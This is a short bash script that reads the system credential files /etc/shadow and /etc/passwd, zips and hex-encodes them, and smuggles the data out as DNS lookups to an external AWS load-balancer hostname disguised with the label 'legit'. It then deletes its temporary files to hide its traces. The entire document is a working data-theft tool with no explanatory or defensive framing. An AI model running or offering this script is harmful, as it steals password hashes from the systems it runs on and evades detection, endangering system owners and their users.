#! /bin/bash
 
epoch=$(date +%s)
mkdir $epoch && cd $epoch || exit 1
cp /etc/shadow shadow.tmp
cp /etc/passwd passwd.tmp
zip exfil.zip *.tmp
rm *.tmp
xxd -p exfil.zip > data
rm exfil.zip
for dat in `cat data`; do dig $dat.legit.term01-b-449152202.us-west-1.elb.amazonaws.com; done
rm data
cd ..
rmdir $epoch 
